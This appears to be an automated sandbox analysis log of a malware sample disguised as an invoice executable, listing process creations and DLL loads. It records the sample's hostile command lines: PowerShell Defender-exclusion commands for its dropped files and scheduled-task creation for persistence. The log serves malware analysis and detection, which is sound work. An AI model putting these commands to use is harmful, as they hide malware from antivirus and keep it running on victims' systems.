Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp85CF.tmp"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Users\user\AppData\Local\Temp\bxhciy.exe C:\Users\user\AppData\Local\Temp\bxhciy.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp9F42.tmp"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HOYVjVj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\bxhciy.exe "C:\Users\user\AppData\Local\Temp\bxhciy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\bdeukn.exe "C:\Users\user\AppData\Local\Temp\bdeukn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp7237.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process created: C:\Users\user\AppData\Roaming\HOYVjVj.exe "C:\Users\user\AppData\Roaming\HOYVjVj.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp85CF.tmp"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Users\user\AppData\Local\Temp\bxhciy.exe C:\Users\user\AppData\Local\Temp\bxhciy.exe
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp9F42.tmp"
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Process created: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: wintypes.dll
